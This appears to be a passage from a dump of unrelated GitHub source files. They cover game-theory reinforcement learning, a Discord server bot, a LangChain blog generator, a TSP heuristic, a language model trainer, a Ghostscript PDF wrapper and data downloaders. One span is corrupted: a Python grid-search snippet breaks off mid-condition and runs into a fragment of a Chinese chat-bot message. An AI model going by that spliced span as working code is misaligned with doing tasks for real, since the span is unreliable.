opt_state_avg, grad_val)\n return new_param_avg, new_opt_state_avg, loss_val\n\n return update\n\n def _act(self, info_state, legal_actions) -> Tuple[int, np.ndarray]:\n \"\"\"Returns an action and the action probabilities.\"\"\"\n info_state = np.reshape(info_state, [1, -1])\n action_probs = self._avg_network_policy(self._params_avg_network,\n info_state)\n # Remove illegal actions and normalize probs\n probs = np.zeros(self._num_actions)\n action_probs = np.asarray(action_probs)\n probs[legal_actions] = action_probs[0][legal_actions]\n probs /= sum(probs)\n action = np.random.choice(len(probs), p=probs)\n return action, probs\n\n @property\n def loss(self) -> Optional[float]:\n \"\"\"Return the latest loss.\"\"\"\n return self._last_loss_value\n\n def step(self,\n time_step: rl_environment.TimeStep,\n is_evaluation: bool = True) -> Optional[rl_agent.StepOutput]:\n \"\"\"Returns the action to be taken by following the average network policy.\n\n Note that unlike most other algorithms, this method doesn't train the agent.\n Instead, we add new samples to the reservoir buffer and the training happens\n at a later stage.\n\n Args:\n time_step: an instance of rl_environment.TimeStep.\n is_evaluation: bool, whether this is a training or evaluation 
call.\n\n Returns:\n A `rl_agent.StepOutput` containing the action probs and chosen action.\n \"\"\"\n\n # Prepare for the next episode.\n if time_step.last():\n return\n\n if is_evaluation:\n # Use the average policy network.\n info_state = time_step.observations['info_state'][self._player_id]\n legal_actions = time_step.observations['legal_actions'][self._player_id]\n action, probs = self._act(info_state, legal_actions)\n return rl_agent.StepOutput(action=action, probs=probs)\n\n # Use the best response agent and add the transition in the reservoir\n # buffer.\n br_agent_output = self._br_rl_agent.step(time_step, is_evaluation=True)\n self._add_transition(time_step, br_agent_output)\n return br_agent_output\n\n def _add_transition(self, time_step, agent_output):\n \"\"\"Adds the new transition using `time_step` to the reservoir buffer.\n\n Transitions are in the form (time_step, agent_output.probs, legal_mask).\n\n Args:\n time_step: an instance of rl_environment.TimeStep.\n agent_output: an instance of rl_agent.StepOutput.\n \"\"\"\n legal_actions = time_step.observations['legal_actions'][self._player_id]\n legal_actions_mask = np.zeros(self._num_actions)\n legal_actions_mask[legal_actions] = 1.0\n transition = Transition(\n info_state=(time_step.observations['info_state'][self._player_id][:]),\n action_probs=agent_output.probs,\n legal_actions_mask=legal_actions_mask)\n self._reservoir_buffer.add(transition)\n\n def _loss_avg(self, param_avg, info_states, action_probs):\n avg_logit = self.avg_network.apply(param_avg, info_states)\n loss_value = -jnp.sum(\n action_probs * jax.nn.log_softmax(avg_logit)) / avg_logit.shape[0]\n return loss_value\n\n def learn(self) -> Optional[float]:\n \"\"\"Compute the loss on sampled transitions and perform a avg-network update.\n\n If there are not enough elements in the buffer, no loss is computed and\n `None` is returned instead.\n\n Returns:\n The average loss obtained on this batch of transitions or `None`.\n \"\"\"\n if (len(self._reservoir_buffer) < self._batch_size or\n len(self._reservoir_buffer) < self._min_buffer_size_to_learn):\n return None\n\n transitions = self._reservoir_buffer.sample(self._batch_size)\n info_states = np.asarray([t.info_state for t in transitions])\n action_probs = np.asarray([t.action_probs for t in transitions])\n\n self._params_avg_network, self._opt_state, loss_val_avg = self._jit_update(\n self._params_avg_network, self._opt_state, info_states, action_probs)\n self._last_loss_value = float(loss_val_avg)\n return loss_val_avg\n\n\nclass AverageNetworkFictitiousPlay(object):\n \"\"\"Deep Average-network Fictitious Play.\n\n See the file description for more information.\n \"\"\"\n\n def __init__(self,\n game: pyspiel.Game,\n envs: Sequence[rl_environment.Environment],\n br_rl_agents: Sequence[rl_agent.AbstractAgent],\n num_episodes_per_iteration: int,\n num_training_steps_per_iteration: int,\n eval_every: int = 200,\n logging_fn: Optional[Callable[[int, int, Dict[str, Any]],\n None]] = None,\n **kwargs):\n \"\"\"Initializes the greedy policy.\n\n Args:\n game: The game to analyze.\n envs: RL environment for each player.\n br_rl_agents: Best response, e.g. DQN, agents for each player.\n num_episodes_per_iteration: Number of episodes to collect samples that are\n added to the reservoir buffer.\n num_training_steps_per_iteration: Number of steps to train the average\n policy in each iteration.\n eval_every: Number of training steps between two evaluations.\n logging_fn: Callable for logging the metrics. 
The arguments will be the\n current iteration, episode and a dictionary of metrics to log.\n **kwargs: kwargs passed to the AveragePolicy() constructor.\n \"\"\"\n self._game = game\n self._envs = envs\n self._num_episodes_per_iteration = num_episodes_per_iteration\n self._num_training_steps_per_iteration = num_training_steps_per_iteration\n self._eval_every = eval_every\n self._logging_fn = logging_fn\n\n self._num_players = game.num_players()\n self._fp_iteration = 0\n\n env = self._envs[0]\n info_state_size = env.observation_spec()['info_state'][0]\n num_actions = env.action_spec()['num_actions']\n\n self._avg_rl_agents = [\n AveragePolicy(p, br_rl_agents[p], info_state_size, num_actions,\n **kwargs) for p in range(self._num_players)\n ]\n self._policy = rl_agent_policy.JointRLAgentPolicy(\n self._game,\n {idx: agent for idx, agent in enumerate(self._avg_rl_agents)},\n use_observation=env.use_observation)\n self._update_distribution()\n\n def _update_distribution(self):\n \"\"\"Calculates the current distribution and updates the environments.\"\"\"\n self._distribution = distribution.DistributionPolicy(\n self._game, self._policy)\n for env in self._envs:\n env.update_mfg_distribution(self._distribution)\n\n @property\n def policy(self) -> rl_agent_policy.JointRLAgentPolicy:\n return self._policy\n\n def iteration(self):\n \"\"\"An average-network fictitious play step.\"\"\"\n # Generate samples using latest best-response and add them to the reservoir\n # buffer. Note that the algorithm is agnostic to the best-response policies\n # as we only use them to collect new samples. They can be approximate (e.g.\n # backed by a deep algorithm) or exact.\n training.run_episodes(\n self._envs,\n self._avg_rl_agents,\n num_episodes=self._num_episodes_per_iteration,\n is_evaluation=False)\n\n # Train the average policy.\n for step in range(self._num_training_steps_per_iteration):\n for avg_rl_agent in self._avg_rl_agents:\n avg_rl_agent.learn()\n\n if self._logging_fn and (step + 1) % self._eval_every == 0:\n self._logging_fn(\n self._fp_iteration, step, {\n f'avg_agent{i}/loss': float(agent.loss)\n for i, agent in enumerate(self._avg_rl_agents)\n })\n\n # Update the distribution.\n self._update_distribution()\n self._fp_iteration += 1\n","repo_name":"deepmind/open_spiel","sub_path":"open_spiel/python/mfg/algorithms/average_network_fictitious_play.py","file_name":"average_network_fictitious_play.py","file_ext":"py","file_size_in_byte":11765,"program_lang":"python","lang":"en","doc_type":"code","stars":3700,"dataset":"github-code","pt":"37"} +{"seq_id":"16701794032","text":"import discord\nfrom discord.ext import commands\n\narrow = \"\"\nkwee = \"<:kannawee:877036162122924072>\"\nkdance = \"\"\nkbored = \"<:kanna_bored:877036162827583538>\"\nksmug = \"<:kanna_smug:877038777896427560>\"\nheart = \"\"\n\nclass Server(commands.Cog):\n def __init__(self, client):\n self.client = client\n self.kana_id = 857835279259664403\n\n @commands.command()\n @commands.is_owner()\n async def sabout(self, ctx):\n kana = self.client.get_user(self.kana_id)\n about_file = discord.File(\"./images/about_server.png\")\n await ctx.send(file = about_file)\n emb = discord.Embed(title=f\"{kdance} ABOUT SERVER {kdance}\",description = f\"{arrow} **DRAGON LOLI'S HOME** is the official Server of the bot **Kanna Chan**. It's a friendly community meant for having fun, chilling and spending time with others.\\n{arrow} This server has cute emotes and a lot of fun events are about to be done here! 
So, stay tuned!\", color=0xfc74c6)\n        emb.add_field(\n            name=f\"{kwee} __ROLES__\",\n            value=f\"{arrow} <@&876800883441156138> The highest role supposed to be only for Kanna Chan.\\n{arrow} <@&876817811396263946> Admins of the Server and have the highest power and authority after owner.\\n{arrow} <@&876818242058997791> Moderators of the server meant to moderate the chat and maintain a positive environment in community.\\n{arrow} <@&876801038420701196> Developer(s) of Kanna Chan have this role.\\n{arrow} <@&876804164661944340> All other users who join this server get this role by default. They have image and embed perms by default.\\n{arrow} **PS: APART FROM THESE, SELF-ROLES ARE ALSO AVAILABLE FOR MEMBERS.**\",\n            inline=False\n        )\n        emb.add_field(\n            name=f\"{ksmug} __CHANNELS__\",\n            value=f\"{arrow} <#877030933847490691> Read the rules here.\\n{arrow} <#877031867440832574> Channel for grabbing self-roles.\\n{arrow} <#876798564704084011> The general chat for the server.\\n{arrow} <#876798809819189249> Bot Commands should be executed here.\\n{arrow} <#876798696078065694> You can give suggestions for improving Kanna Chan here.\\n{arrow} <#876798720254029864> You can report BUGS here if you find any in Kanna Chan.\\n{arrow} <#876798750876651530> For any other support or query use this channel.\\n{arrow} **P.S: YOU CAN PING ANY STAFF MEMBER OR DEVELOPER WHILE REPORTING BUG OR IN CASE OF ANY QUERY.**\",\n            inline=False\n        )\n        emb.set_footer(\n            text=\"Kanna Chan\",\n            icon_url=kana.avatar_url\n        )\n        await ctx.send(embed=emb)\n\n    @commands.command()\n    @commands.is_owner()\n    async def rule(self, ctx):\n        kana = self.client.get_user(self.kana_id)\n        rule_file = discord.File(\"./images/rules.png\")\n        await ctx.send(file=rule_file)\n        emb = discord.Embed(title=f\"{kbored} RULES {kbored}\", color=0xfc74c6)\n        emb.add_field(\n            name=f\"{heart} **Be respectful**\",\n            value=f\"You must respect all users, regardless of your liking towards them. Treat others the way you want to be treated.\",\n            inline=False\n        )\n        emb.add_field(\n            name=f\"{heart} **No Inappropriate Language**\",\n            value=f\"{arrow} The use of profanity should be kept to a minimum. However, any derogatory language towards any user is prohibited.\",\n            inline=False\n        )\n        emb.add_field(\n            name=f\"{heart} **No spamming**\",\n            value=f\"{arrow} Don't send a lot of small messages right after each other. Do not disrupt chat by spamming.\",\n            inline=False\n        )\n        emb.add_field(\n            name=f\"{heart} **No pornographic/adult/other NSFW material**\",\n            value=f\"{arrow} This is a community server and not meant to share this kind of material.\",\n            inline=False\n        )\n        emb.add_field(\n            name=f\"{heart} **No advertisements**\",\n            value=f\"{arrow} We do not tolerate any kind of advertisements, whether it be for other communities or streams. 
You can post your content in the media channel if it is relevant and provides actual value (Video/Art)\",\n inline=False\n )\n emb.add_field(\n name=f\"{heart} **No offensive names and profile pictures**\",\n value=f\"{arrow} You will be asked to change your name or picture if the staff deems them inappropriate.\",\n inline=False\n )\n emb.add_field(\n name=f\"{heart} **Server Raiding**\",\n value=f\"{arrow} Raiding or mentions of raiding are not allowed.\",\n inline=False\n )\n emb.add_field(\n name=f\"{heart} **Direct & Indirect Threats**\",\n value=f\"{arrow} Threats to other users of DDoS, Death, DoX, abuse, and other malicious threats are absolutely prohibited and disallowed.\",\n inline=False\n )\n emb.add_field(\n name=f\"{heart} **Follow the Discord Community Guidelines**\",\n value=f\"{arrow} You can find them here: https://discordapp.com/guidelines\",\n inline=False\n )\n emb.add_field(\n name=f\"{heart} **VOICE CHANNELS**\",\n value=f\"{arrow} Do not join voice chat channels without permission of the people already in there.\",\n inline=False\n )\n emb.add_field(\n name=f\"{heart} **DECISIONS AND ISSUES**\",\n value = f\"{arrow} ***The Admins and Mods will Mute/Kick/Ban per discretion. If you feel mistreated DM an Admin and we will resolve the issue.***\",\n inline=False\n )\n emb.add_field(\n name=f\"{heart} **CHANGES**\",\n value = f\"{arrow} ***Your presence in this server implies accepting these rules, including all further changes. These changes might be done at any time without notice, it is your responsibility to check for them.***\",\n inline=False\n )\n emb.set_footer(\n text=\"Kanna Chan\",\n icon_url=kana.avatar_url\n )\n await ctx.send(embed=emb)\n\n @commands.Cog.listener()\n async def on_member_join(self, member):\n if member.guild.id == 876798564704084008:\n if member.bot:\n return\n else:\n member_role = member.guild.get_role(876804164661944340)\n await member.add_roles(member_role)\n desc = f\"{member.name} Thanks for joining Kanna's Server. The server is currently under construction, Thanks for being an **early supporter**!! If you need any kind of help or support just ping any staff member or DM `aSHish#1198`. 
Have a nice stay in the server :)\"\n                await member.send(desc)\n        else:\n            return\n\ndef setup(client):\n    client.add_cog(Server(client))\n    print(\">> Server Utility loaded\")","repo_name":"asrvd/Kanna-Chan","sub_path":"cogs/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6897,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"25794451164","text":"# Bring in deps\r\nimport os \r\nfrom apikey import apikey\r\nimport streamlit as st \r\nfrom langchain.llms import OpenAI\r\nfrom langchain.prompts import PromptTemplate\r\nfrom langchain.chains import LLMChain, SequentialChain \r\nfrom langchain.memory import ConversationBufferMemory\r\nfrom langchain.utilities import WikipediaAPIWrapper \r\n\r\nos.environ['OPENAI_API_KEY'] = apikey\r\n\r\n# App framework\r\nst.title('🔗 Content Creator')\r\nprompt = st.text_input('Plug in the Keyword for the content you want to create') \r\n\r\n# Get a response\r\nimport openai\r\n\r\ntitle_template = PromptTemplate(\r\n    input_variables = ['topic'], \r\n    template='write me a content title about {topic} related to VOIP consisting of at least 1 positive word and 1 power word, and it must be at most 60 characters'\r\n)\r\n\r\noutline_template= PromptTemplate(\r\n    input_variables=['title'],\r\n    template='AZ Wholesale: {title}. Based on the provided information, please create an outline for the blog; the blog will be 2000 words. It needs a title of at most 60 characters that uses a power word, a positive word and a number; the meta description should be a maximum of 160 characters; and the content should have a detailed outline. Include H1, H2, H3 and H4 headings.'\r\n)\r\n\r\nscript_template = PromptTemplate(\r\n    input_variables= ['title','outline'], \r\n    template='Article title: {title}. Article outline: {outline}. I would like to start creating the article with the first section. Please write only the first section now; each time I submit, 
we will write the next one'\r\n)\r\n\r\n# Memory \r\ntitle_memory = ConversationBufferMemory(input_key='topic', memory_key='chat_history')\r\nscript_memory = ConversationBufferMemory(input_key='title', memory_key='chat_history')\r\noutline_memory = ConversationBufferMemory(input_key='title', memory_key='chat_history')  # input_key must match the chain's input ('title'); 'topic' raised a KeyError when saving context\r\n# Llms\r\nllm = OpenAI(temperature=0.9) \r\ntitle_chain = LLMChain(llm=llm, prompt=title_template, verbose=True, output_key='title', memory=title_memory)\r\nscript_chain = LLMChain(llm=llm, prompt=script_template, verbose=True, output_key='script', memory=script_memory)\r\nwiki = WikipediaAPIWrapper()\r\noutline_chain=LLMChain(llm=llm,prompt=outline_template, verbose=True, output_key='outline', memory=outline_memory)\r\n\r\n# Show stuff to the screen if there's a prompt\r\nif prompt: \r\n    title = title_chain.run(prompt)\r\n    outline= outline_chain.run(prompt)\r\n    wiki_research = wiki.run(prompt) \r\n    script = script_chain.run(title=title, outline=outline)  # the prompt expects 'title' and 'outline'; passing wikipedia_research raised a missing-variable error\r\n\r\n    st.write(title) \r\n    st.write(script)\r\n    st.write(outline)\r\n\r\n    with st.expander('Title History'): \r\n        st.info(title_memory.buffer)\r\n\r\n    with st.expander('Script History'): \r\n        st.info(script_memory.buffer)\r\n\r\n    with st.expander('Outline Points'):\r\n        st.info(outline_memory.buffer)","repo_name":"mycountrymobile/content_creator","sub_path":"content/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26374985513","text":"from django.conf.urls import url\nfrom registration import views\n\nurlpatterns = [\n    url(r'^register/$',views.register_user,name='register_user'),\n    url(r'^logout_user/$', views.logout_user, name='logout_user'),\n    url(r'^login_user/$',views.login_user,name='login_user'),\n    url(r'^profile/$',views.profile,name='profile'),\n    url(r'^createprofile/$',views.createprofile,name='createprofile'),\n]\n","repo_name":"Yeasincse/Standard-User-Registration-Login-Logout-Tutorial","sub_path":"Servicenen/registration/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"10107151339","text":"'''\n    Implementing Nearest Neighbor Heuristic to solve Traveling Salesman problems\n'''\ndef tspNearestNeighborHeuristic(cities, distance):\n    visited = []\n    minimum_distance_traveled = []\n\n    neighbor = 'A'\n    start_node_index = cities.index(neighbor)\n\n    no_nodes = len(cities)\n    noN = 0\n    while noN < no_nodes and neighbor not in visited:\n\n        visited.append(neighbor)\n        neighbor_index = cities.index(neighbor)\n        noNeigjbour = 0\n        MIN = 0\n\n        while noNeigjbour < len(distance[neighbor_index]):\n\n            if cities[noNeigjbour] not in visited: #look for unvisited cities.\n                if MIN == 0:\n                    MIN = distance[neighbor_index][noNeigjbour]\n                    neighbor = cities[noNeigjbour]\n                else:\n                    min_distance = min(distance[neighbor_index][noNeigjbour], MIN)\n                    if distance[neighbor_index][noNeigjbour] < MIN:\n                        MIN = min_distance\n                        neighbor = cities[noNeigjbour]\n            noNeigjbour += 1\n        minimum_distance_traveled.append(MIN)\n        noN += 1\n    last_node_index = cities.index(visited[-1])\n    minimum_distance_traveled[-1] = distance[last_node_index][start_node_index]\n    print('Shortest route : ', \" -> \".join(visited))\n    for _i in range(len(visited)):\n        print(\"City \" + visited[_i] + \"'s Nearest Neighbor's Distance is \", minimum_distance_traveled[_i])\n    print(\"total traveled distance: \", 
sum(minimum_distance_traveled))\n\n\n\ncities = ['A', 'B', 'C', 'D', 'E']\ndistance = [[0, 60, 217, 164, 69],\n [60, 0, 290, 201, 79],\n [217, 290, 0, 113, 303],\n [164, 201, 113, 0, 196],\n [69, 79, 303, 196, 0]]\n\ntspNearestNeighborHeuristic(cities, distance)\n","repo_name":"sindhusweety/Linear-Programming-Problem-Solver","sub_path":"tspNearestNeighborMethod.py","file_name":"tspNearestNeighborMethod.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11086149933","text":"import numpy as np\n# import os; os.chdir('C:/Users/ingulbull/Desktop/2019-1/Repro_study_2019_1')\nimport torch\nimport torch.nn as nn\nfrom preprocess import *\nfrom loader import train_loader, val_loader\nfrom model import Highway, CharAwareLM\nfrom config import src\n\n\n## Hyper Parameters\nlearning_rate = 1.0\nnum_epochs = 25\n\nclass Trainer():\n def __init__(self, src, learning_rate, num_epochs, train_loader, val_loader, train_char_idx, target_train, val_char_idx, target_val):\n self.char_vocab = src['char_vocab']\n self.word_vocab = src['word_vocab']\n self.max_len = src['maxLen']\n self.time_steps = src['time_steps']\n self.embed_size_char = src['embed_size_char']\n self.hidden_size = src['hidden_size']\n self.num_layer = src['num_layer']\n self.lr = learning_rate\n self.num_epochs = num_epochs\n self.batch_size = src['batch_size']\n self.model = CharAwareLM(src)\n # self.model.init_weight()\n self.train_loader = train_loader\n self.val_loader = val_loader\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n self.train = train_char_idx\n self.target_train = target_train\n self.val = val_char_idx\n self.target_val = target_val\n\n def _train(self):\n best_ppl = 10000\n model = self.model\n device = self.device\n model = model.to(device)\n\n print('Current Mode is', device)\n\n criterion = nn.CrossEntropyLoss()\n # optimizer = torch.optim.SGD(filter(\n # lambda p: p.requires_grad, model.parameters()),\n # lr = self.lr\n # )\n optimizer = torch.optim.SGD(filter(\n lambda p: p.requires_grad, model.parameters()),\n lr = self.lr\n )\n\n for epoch in range(self.num_epochs):\n h_with_c = [torch.zeros(self.num_layer, self.batch_size, self.hidden_size).to(device)] * 2\n model.train(True)\n\n for i in range(0, self.train.shape[0] - self.batch_size, self.batch_size):\n # for i, (data_char, target) in enumerate(self.train_loader):\n # data_char = data_char.to(device)\n # target = target.to(device)\n data_char = self.train[i : i + self.batch_size, :, :].to(device)\n target = self.target_train[(i+1) : (i+1) + self.batch_size, :].to(device)\n\n h_with_c = [state.detach() for state in h_with_c]\n out, h_with_c = model(data_char, h_with_c)\n\n loss = criterion(out, target.view(-1))\n loss.backward()\n\n nn.utils.clip_grad_norm_(model.parameters(), 5)\n optimizer.step()\n\n model.zero_grad()\n\n step = i+1\n if step % 100 == 0:\n print('Epoch [%d/%d], Step [%d/%d], Loss: %.4f, Perplexity: %5.2f' %\n (epoch+1, self.num_epochs, step // self.time_steps, len(self.train_loader) // self.time_steps,\n loss.item(), np.exp(loss.item())))\n\n model.eval()\n val_loss = self._validate(model, h_with_c, criterion)\n val_ppl = np.exp(val_loss)\n\n if best_ppl - val_ppl < 1:\n if self.lr > 0.03:\n self.lr = self.lr * 0.5\n print('Adjusted learning_rate: %.5f' % self.lr)\n optimizer = torch.optim.SGD(filter(\n lambda p: p.requires_grad, model.parameters()),\n lr = self.lr\n )\n else:\n pass\n\n if val_ppl < 
best_ppl:\n                print('Current best Val Loss: ', val_loss)\n                best_ppl = val_ppl\n                torch.save(model.state_dict(), 'model' + str(val_ppl) + '.pkl')\n\n\n    def _validate(self, model, hidden, criterion):\n        device = self.device\n\n        val_loss = 0\n        step = 0\n        for i in range(0, self.val.shape[0] - self.batch_size, self.batch_size):  # was the bare name 'val', which is undefined inside the class\n        # for i, (data_char, target) in enumerate(self.val_loader):\n            # data_char = data_char.to(device)\n            # target = target.to(device)\n            data_char = self.val[i : i + self.batch_size, :, :].to(device)\n            target = self.target_val[(i+1) : (i+1) + self.batch_size, :].to(device)\n\n            out_val, _ = model(data_char, hidden)\n            loss = criterion(out_val, target.view(-1))\n            val_loss += loss.item()\n            step += 1\n\n            model.zero_grad()\n\n        print('Val Loss: %.4f, Perplexity: %5.2f' % (val_loss / step, np.exp(val_loss / step)))\n\n        return val_loss / step\n    # def _validate(self, valid_loader):\n    #\n\ntrainer = Trainer(src, learning_rate, num_epochs, train_loader, val_loader, train_char_idx, target_train, val_char_idx, target_val)\ntrainer._train()\n","repo_name":"EmberLee/Character-aware_Language_Model_by_Pytorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33570407335","text":"from setuptools import setup, find_packages\nimport os\n\nPATH = os.path.dirname(os.path.abspath(__file__))\ntemplates_dir = os.path.join(PATH, \".\")\ntemplates_files = [os.path.join(templates_dir, file) for file in os.listdir(templates_dir)]\n\nsetup(name='PyVoodoo',\n      version='0.0.1',\n      description='Small library to generate code and bytecode dynamically',\n      author='Ernesto Bossi',\n      author_email='bossi.ernestog@gmail.com',\n      url='https://github.com/bossiernesto/pyVoodoo',\n      license='GPL v3',\n      keywords='',\n      packages=find_packages(exclude=[\"test\"]),\n      data_files=[\n          (templates_dir, templates_files)\n      ],\n      install_requires=[],\n      package_dir={'PyVoodoo': 'pyVoodoo'},\n      classifiers=[\"Development Status :: 1 - Planning\",\n                   \"Topic :: Utilities\",\n                   \"License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)\"]\n)\n","repo_name":"bossiernesto/pyVoodoo","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11072083922","text":"def convolution(spectrum):\n    \n    \"\"\"Input: A collection of integers Spectrum.\n    Output: The list of elements in the convolution of Spectrum. 
If an element has\n multiplicity k, it should appear exactly k times; you may return the elements in any order.\"\"\"\n \n spectrum = sorted(spectrum)\n return [i-j for i in spectrum for j in spectrum if i-j > 0] \n\n#Read input data\nf = open('dataset_104_4.txt')\nspectrum = map(int, f.read().strip().split())\n\n# Call function\nans = convolution(spectrum)\n\n#Output in right format\nprint (' '.join(str(i) for i in ans))\n","repo_name":"mars1198/bioinformatics","sub_path":"SpectralConvolutionProblem.py","file_name":"SpectralConvolutionProblem.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70576248427","text":"import sys\nfrom _collections import deque\nsys.stdin=open('17070_파이프옮기기.txt')\n\ndef issafe(node, data):\n if (0<=node[0]\\n庆典筹备计划唔,你可能需要这个,大概···', type='Xml')\n return MessageChain.create([app])\n else:\n if hello=='签到成功':\n return MessageChain.create([Plain(\"* 签到仅在4-10点开放\")])\n else:\n if 0 None:\n self.process = process\n super().__init__(message)\n\n\ndef _validate_device(device: str) -> str:\n if device not in [\"pnggray\", \"png16m\", \"png256\"]:\n raise ValueError(\"Invalid device\")\n\n return device\n\n\ndef rasterize_page(\n fp: Union[PathLike, str],\n output_path: str,\n idx: int,\n *,\n dpi: int = 200,\n device=\"pnggray\",\n):\n device = _validate_device(device)\n args = [\n GS,\n \"-q\",\n \"-dSAFER\",\n \"-dBATCH\",\n \"-dNOPAUSE\",\n \"-sDEVICE=png16m\",\n \"-dTextAlphaBits=4\",\n \"-dGraphicsAlphaBits=4\",\n f\"-sDEVICE={device}\",\n f\"-dFirstPage={idx}\",\n f\"-dLastPage={idx}\",\n f\"-r{dpi}\",\n f\"-sOutputFile={output_path}\",\n \"-f\",\n str(fp),\n ]\n\n result = run(args, stdout=PIPE, stderr=PIPE, check=False)\n\n if result.returncode != 0:\n raise GhostscriptError(\"Ghostscript failed to rasterize the document: \", result)\n\n return result\n\n\ndef rasterize_page_to_bytes(fp: Union[PathLike, str], idx: int, *, dpi: int = 200, device=\"pnggray\") -> bytes:\n if isinstance(fp, bytes):\n with tempfile.NamedTemporaryFile(suffix=\".pdf\") as f:\n f.write(fp)\n f.flush()\n result = rasterize_page(f.file.name, \"%stdout\", idx, dpi=dpi, device=device)\n else:\n result = rasterize_page(fp, \"%stdout\", idx, dpi=dpi, device=device)\n\n return result.stdout\n\n\ndef rasterize_page_to_path(\n fp: Union[PathLike, str],\n idx: int,\n output_path: PathLike,\n *,\n dpi: int = 200,\n device=\"pnggray\",\n) -> Path:\n if isinstance(fp, bytes):\n with tempfile.NamedTemporaryFile(suffix=\".pdf\") as f:\n f.write(fp)\n f.flush()\n rasterize_page(f.file.name, str(output_path), idx, dpi=dpi, device=device)\n else:\n rasterize_page(fp, str(output_path), idx, dpi=dpi, device=device)\n\n return Path(output_path)\n\n\ndef compress_pdf(\n fp: Union[PathLike, str], # Ghostscript insists on a file instead of bytes\n output_path: str,\n *,\n compression: Literal[\"jpeg\", \"lossless\"] = \"jpeg\",\n):\n compression_args = []\n if compression == \"jpeg\":\n compression_args = [\n \"-dAutoFilterColorImages=false\",\n \"-dColorImageFilter=/DCTEncode\",\n \"-dAutoFilterGrayImages=false\",\n \"-dGrayImageFilter=/DCTEncode\",\n ]\n elif compression == \"lossless\":\n compression_args = [\n \"-dAutoFilterColorImages=false\",\n \"-dColorImageFilter=/FlateEncode\",\n \"-dAutoFilterGrayImages=false\",\n \"-dGrayImageFilter=/FlateEncode\",\n ]\n else:\n compression_args = [\n \"-dAutoFilterColorImages=true\",\n \"-dAutoFilterGrayImages=true\",\n ]\n\n args_gs = (\n [\n GS,\n \"-q\",\n 
\"-dBATCH\",\n \"-dNOPAUSE\",\n \"-dSAFER\",\n \"-dCompatibilityLevel=1.5\",\n \"-sDEVICE=pdfwrite\",\n \"-dAutoRotatePages=/None\",\n \"-sColorConversionStrategy=LeaveColorUnchanged\",\n ]\n + compression_args\n + [\n \"-dJPEGQ=95\",\n \"-dPDFA=2\",\n \"-dPDFACompatibilityPolicy=1\",\n \"-sOutputFile=\" + output_path,\n str(fp),\n ]\n )\n\n result = run(args_gs, stdout=PIPE, stderr=PIPE, check=False)\n\n if result.returncode != 0:\n raise GhostscriptError(\"Ghostscript failed to compress the document\", result)\n\n return result\n\n\ndef compress_pdf_to_bytes(fp: Union[PathLike, str], *, compression: Literal[\"jpeg\", \"lossless\"] = \"jpeg\") -> bytes:\n result = compress_pdf(fp, output_path=\"%stdout\", compression=compression)\n\n return result.stdout\n\n\ndef compress_pdf_to_path(\n fp: Union[PathLike, str],\n output_path: PathLike,\n *,\n compression: Literal[\"jpeg\", \"lossless\"] = \"jpeg\",\n) -> Path:\n compress_pdf(fp, output_path=str(output_path), compression=compression)\n\n return Path(output_path)\n","repo_name":"Page-Leaf/Docprompt","sub_path":"docprompt/_exec/ghostscript.py","file_name":"ghostscript.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3910948783","text":"from shutil import rmtree\n\nimport requests\nimport wbdata\nfrom git import Repo\nfrom time import sleep\n\ndef delete_directory(path):\n \"\"\"\n Remove directory.\n \"\"\"\n\n try:\n rmtree(path)\n except FileNotFoundError:\n pass \n\ndef download_covid():\n \"\"\"\n Download COVID-19 case data.\n \"\"\"\n\n url = 'https://github.com/CSSEGISandData/COVID-19'\n path = './data/COVID-19'\n\n print('Downloading covid data.')\n\n delete_directory(path=path)\n\n # Clone repo with covid data\n Repo.clone_from(url, to_path=path)\n\ndef download_countries():\n \"\"\"\n Download countries csv.\n \"\"\"\n \n url = 'https://datahub.io/JohnSnowLabs/country-and-continent-codes-list/r/country-and-continent-codes-list-csv.csv'\n path = './data/datahub'\n\n print('Downloading country data.')\n\n delete_directory(path=path)\n\n req = requests.get( url=url)\n content = req.content\n with open(f'{path}/countries.csv', 'wb') as csv:\n csv.write(content)\n\ndef download_world_bank():\n \"\"\"\n Download data from the World Bank\n \"\"\"\n\n path = './data/world_bank'\n\n delete_directory(path=path)\n\n indicators = [{'NY.GDP.PCAP.PP.CD': f'GDP per capita, PPP (current international $)'},\n {'SP.POP.TOTL': f'Population, total'},\n {'SP.URB.TOTL.IN.ZS': f'Urban population (% of total population)'},\n {'EN.POP.SLUM.UR.ZS': f'Urban population (% of total population)'},\n {'SP.RUR.TOTL.ZS': f'Urban population (% of total population)'},\n {'SP.DYN.LE00.IN': f'Life expectancy at birth, total (years)'},\n {'SH.XPD.CHEX.GD.ZS': f'Current health expenditure (% of GDP)'}]\n\n for indicator in indicators:\n\n file_name = list(indicator.keys())[0]\n full_path = f'{path}/{file_name}.csv'\n\n print(f'Downloading {indicator}.') \n\n try:\n df = wbdata.get_dataframe(indicator)\n df.to_csv(full_path)\n sleep(2)\n except Exception:\n print(f'Download failed for {indicator}')\n\nif __name__ == '__main__':\n \n download_covid() \n download_countries()\n download_world_bank()","repo_name":"shsarv/Data-Analytics-Projects-in-python","sub_path":"COVID19/data/download_data.py","file_name":"download_data.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"37"} 
